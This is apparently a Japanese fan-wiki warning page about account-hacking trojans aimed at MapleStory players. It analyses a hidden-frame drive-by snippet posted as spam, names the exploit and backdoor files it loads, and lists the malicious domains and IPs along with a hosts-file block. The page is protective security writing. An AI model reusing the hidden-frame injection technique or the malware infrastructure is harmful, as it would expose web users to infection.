このページには執筆者の推論も含まれています。
内容が内容だけにこのページは管理人以外は編集できなくしています(凍結)
ブログだけじゃないですが・・・
最近ではブログはもちろん、
2chやうちの掲示板にもiframe入りのサイトでウィルスへ感染させようとする書き込みが多いです。
メイプルユーザーをまっすぐに「狙った」と確信できるこれらの書き込みは
現在のパス抜き騒動の原因と考えるのは自然な流れでしょう。
ちなみに、やっぱり犯人は中国圏サイトへ誘導してました。
これによって中国IPの攻撃者がやっていると予想していますが、
まず不思議だったのは、このサイトは中国圏のIPは全弾きなのに
何故中国圏ウイルスURLを張りにこれるのか。
ウィルスを張りにきているIPは日本の接続元なんだけど
このIP(接続元)がVPNかなんかで簡単に入られるようになっているぽい。
211.8.210.189が踏み台と思われるIPなんだけどこのIPの所有者への報告先がどこかわからないんだよねー
分かる人がいたらお願いします。
最近では中国のサイトからの書き込みに敏感に反応するサイトオーナーも多いですが
攻撃者は普通に日本人(のIPを持って)サイトへ侵入し日本語文章を使ってURLを張ってるわけです。おそろしや。
<LV1>
PCに詳しくないならIEではなくFire Foxを使おう
嫌ならせめてセキュリティは高。もしくはActiveXは使わない。
世の中にはIEで溢れている為、攻撃者はIEを的にしたウィルスサイトを作ります。
IEの脆弱性などに詳しくない方であれば
Fire Foxにする事でそういった危険が減少します。
<LV2>
Fire FoxのアドオンのNo Script等を用いてJava Scriptのアクセス遮断する
ウィルス入りサイトの99%はJava ScriptやIEのActiveX等を使用してウィルスを実行させます。
言ってしまえばJava Scriptさえ遮断すれば99%安全です。
ただし正規なものまで遮断するので、いろいろと面倒ですが。
<LV3>
ウィルス対策ソフトは絶対いれよう
「俺は大丈夫」という自信はどこからくるのかw
<LV4>
可能ならファイアウォールソフトも。
特定のアプリ以外からの送信を制御すれば異常に気づきやすいです。
ちなみに僕の環境はFire Fox+No Script。
ウィルスソフトはAvast4でファイアウォールソフトはSygateです。
でも絶対ではないと思っています。
<LV5>
誘導先のページがワンパターンなのでhostsファイルではじいちゃおう
以下は2chのMaplestoryスレでテンプレ化されてる危険サイトURL。
転載します。
■危険サイトにつきNGWord追加、hostsにて遮断推奨 4gameranking.com gamepaslog.com aimeblog.com geoncities.com blog20fc2.com infosueek.w53.okwit.com
とまぁ見慣れたウィルスサイトが続くんですが、
実はこれ 「実態は1個」しかないんです。
つまり2chでテンプレ化されてるこれらのドメインはすべて同じIPへ向かいます
実際に正引きすると全部
61.139.126.53へと向かうドメインであることがわかります。
これを制限すれば、現在メイプル界隈を騒がせてるウィルスサイトのほとんどを防げます。
もちろんそのうち亜種もでてくるでしょうけど・・・
(ちなみに、以前はやったアカウントハックの頃もこのIPのドメイン使ってた。つまり同じ中国業者だと思う)
ってわけでどうやって制限するか、ですけど。
C:\WINDOWS\system32\drivers\etc
にある
hosts
というファイルをメモ帳などで開きます。
127.0.0.1 localhost
と書かれている行の下に
127.0.0.1 61.139.126.53
と追加。
何をやってるかというとこのhostsファイルはDNSの参照よりも早く参照されて
接続の変換などをやってくれます。
127.0.0.1ってのは自分自身のPCをあらわす特別なIPで
http://localhost と入力すれば自分自身を返すようにあらかじめできています。
これに
127.0.0.1 61.139.126.53
を追加することで、61.139.126.53に接続しようとした場合は、自分自身へ接続するようにして接続を回避します。
(ただ、Fire FoxやウィルスソフトがすでにURL自体を定義にしちゃってるから、ほぼ大丈夫ですけどね。)
実際にかかってみたので、その手記を。
うちの掲示板に張られた奴↓
36 名前:名無しさん@DropWiki:2009/10/03(土) 12:33:53 ID:ZN7/BvWQ 経験値計算式の修正、詳しくは各種計算式/経験値の計算を参照 http://geoncities■com/wiki/FrontPage/
書き込み者のIPアドレス
指定ドメイン => 「 211008210189.cidr.odn.ne.jp 」
取得ホスト名 => 211008210189.cidr.odn.ne.jp
取得IPアドレス=> 211.8.210.189 (IPv4)
ここに接続するとwikiwiki.jpのMaple Storyまとめwikiの情報/各種計算式のページへ飛んだ・・・
と思われたが、ソースを見ると
<frameset rows="444,0" cols="*"> <frame src="http://maplematome.wikiwiki.jp/?%BE%F0%CA%F3%2F%B3%C6%BC%EF%B7%D7%BB%BB%BC%B0#l6c34181 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src="http://www■4gameranking.com/xin/" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset>
こんな感じ。
見ただけでは2chのメイプルストーリーまとめwikiに接続してるように見えるが
実は2個のページを読み出していて
http://maplematome.wikiwiki.jp/
へつなぎつつ
http://www■4gameranking.com/xin/
へもつなぎにいきます。
これはwikiwiki.jpがセキュリティ的に甘いとかではなく、簡単にできちゃう事です。
いろんなサイトに張られてるURLもだいたいがここへ集約されていってます。
で、気になる中身ですが
Ms06014.htm Ms07004.js ani.c ani.asp?id=1314 Yahoo.htm
というファイルを同時に読み込ませています。
ウィルス情報詳細 Ani.C (2007/3/30) Ani.Cは、Windowsのアニメーションカーソル・ハンドラであるANIファイルの脆弱性を利用するトロイの木馬であり、システムに他のマルウェアをダウンロードし、インストールします。
とある。つまりー。こいつを使ってまたウイルスをダウンロードするわけだ。
ってわけでこani.cを実行されちゃうとどんなウィルスをダウンロードするか。
中を覗いてみたら
http://www■4gameranking.com/xin/xia■exe
がでてきた。多分、本命はこいつ!!!
さて、どんなファイルがDLされるのだろうか!!!
実行すると
BKDR_HUPIGON.BKBとして検出。
C:ドライブ内に以下のファイルをダウンロード
+レジスタ値変更とかするみたい。
IO.EXE cn.exe win.exe ms.exe dos.exe
動作はバックドア(攻撃者がそのPCへ入れるように対象者のPCに内部からセキュリティホールを作る)を作ったりするらしい
こちらのソースはActiveXの脆弱性をついたもの。
セキュリティホールを利用して任意のコードを実行って奴だと思うけど
ソースみたけど何を実行してるのかわからんちん
以下前回のアカウントハックウィルス騒ぎの奴↓
発覚は自分の妹のブログへのカキコミでした。
ブログのコメントにこのようなカキコミがありました。
3ヶ月記念動画w
メイプルストーリーぽぷら鯖に生息するカポ(てんこ&風神)
の3ヶ月記念動画w...メイプ ルストーリー カポリン メイメ
www.exbloog.com/7***888/000029.zip
カスミちゃんV3 03/03/2008 Mon URL [ Edit ]
URLは修正済み
気になったので他にも検索すると
No title
メイプル 海賊4次
ニコニコから...メイプル海賊4次
www.exbloog.com/7***888/000029.zip
2008.03.03 Mon l ドワ美ちゃん. URL l 編集
こんなのも。
このzip。解凍すると動画アイコンに偽装したexeファイルだったり、scrだったりします。
明らかに怪しいのでひとまず、virustotalにかけてみましたところわずかに1つかかるのみ。→検索結果
つまりこのウィルスは現在対応しているウィルスソフトが少なく、検知されないのです。
さらにzip部分ではなく、「www.exbloog.com/7***888/」は、
アクセスするだけで怪しげな挙動を見せたのでさらに注意が必要です。
このような攻撃で、「メイプルユーザー」を狙ったものは初めてかもしれません。
自分もわからないので仮想PCで踏んでみた。
解凍して出来たあやしげな.scrを踏むと一気に中国IPにアクセスしはじめました。
SS
ってわけでトロイで間違いなさそうです。
一般的にはキーロガーって言われているものかと。
この件とは別のウィルスだと思われますが、メイポを狙ったトロイは1月頃からあったようです。
Win32/PSW.OnLineGames.NLE
ついでに「exbloog」をWhois検索したらwww.bizcn.com (中国のレジストラ?サーバー?)がヒット。
同様に「peacchmax」「livedoor」も検索したら同様の結果だった。
一応結果
指定ドメイン => 「 peacchmax.com 」
取得ホスト名 => peacchmax.com
取得IPアドレス=> 61.139.126.53 (IPv4)
Domain Name: PEACCHMAX.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: ttp://www.bizcn.com
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Status: clientdeleteprohibited
Status: clienttransferprohibited
Updated Date: 11-dec-2007
Creation Date: 11-dec-2007
Expiration Date: 11-dec-2008
メイポ関係のブログコメントのアカウントハックウィルスで使われてるドメインの
ほとんどはwww.bizcn.comで取得されてる模様
この問題のzipを含むURLで検索すると
ラグナロクというオンラインゲームのブログに多く載せられていました。
中にはアダルト関係のページや2chも多くヒット。
まとめると、認識としてラグナロクのキーロガーとして広がっているようです。
「なんだ、メイポ関係ねーじゃん」と思うかもしれないですが、
オンラインゲームの情報収集トロイという意味で大きな違いはない点や、
明らかにスパムとして投稿されているURLを含むコメントが
メイプルに関連した、それもそこまで日本語でおkな文章ではないもので投稿されているという事は
このファイルをメイプルユーザーに踏ませる事が投稿者にとって有益である事の証明です。
今までメイプルを的に絞ったトロイ攻撃は記憶にないですが、今回の件によって
「日本のメイプルユーザーのPASSはWeb上で狙われている」といった認識を持つ必要があると思います。
URLをよく確認しましょう
大手サイトのURLと間違えやすいようなURLを使ってきます。
例えば今回の例ではエキサイトブログのサイト(www.exblog)と間違えやすいように
「www.exbloog」というドメインをウイルス置き場にしている事がわかります。
blogをbloogとしてウイルス置き場にしている場合がほとんどです。
よく確認してください。
誤って踏んでしまった場合の対処は私にはわかりません。
お使いになられているウィルス対策ソフト会社に報告し、
対応してもらう事が一番だと思います。
(ちなみにavast!は2008/3/5現在無反応)
感染を予防するには感染源であるブログへのコメントを規制する事です。
ブログの管理人様は、ブログのカキコミに怪しいURL(exeやzip等)を載せたものがないか常に注意し、
必要であれば、exeやzipといった単語を規制するのがよいと思います。
私自身、これを知ったのがついさきほどで、
確かで豊富な知識を提示できるわけではありませんが、
PC有害なファイルである事は確かです。
一人でも被害に逢われる事のないよう、記事にします。
早速記事になってますね。さすがです。
パス抜きされないために
私より前にメイポでこの件について注意を呼びかけていた方。
どん☆がばちょ
ラグナロクのウィルスとして猛威を振るっていた事もあってか、
ラグナロク関連のまとめサイト等には情報が多くよせられていました。
この手のウイルスは総称として「アカウントハックウイルス」と呼ばれているようで
リネージュや他のオンラインゲームでも似た手口であったことから
今回のメイプルストーリーに対する「アカウントハックウイルス」対策について
有益な情報が多いと思いますのでいくつかリンクします。
BSWiki「安全のために」
リネージュ資料室
ROアカウントハック対策スレのまとめサイト
情報提供以外のコメントは削除される恐れがあります。掲示板をご利用下さい。
質問スレ13 / 雑談スレ12 / ドロップ討論スレ / 要望・批判スレ2
--------------------------------------
コメントページを参照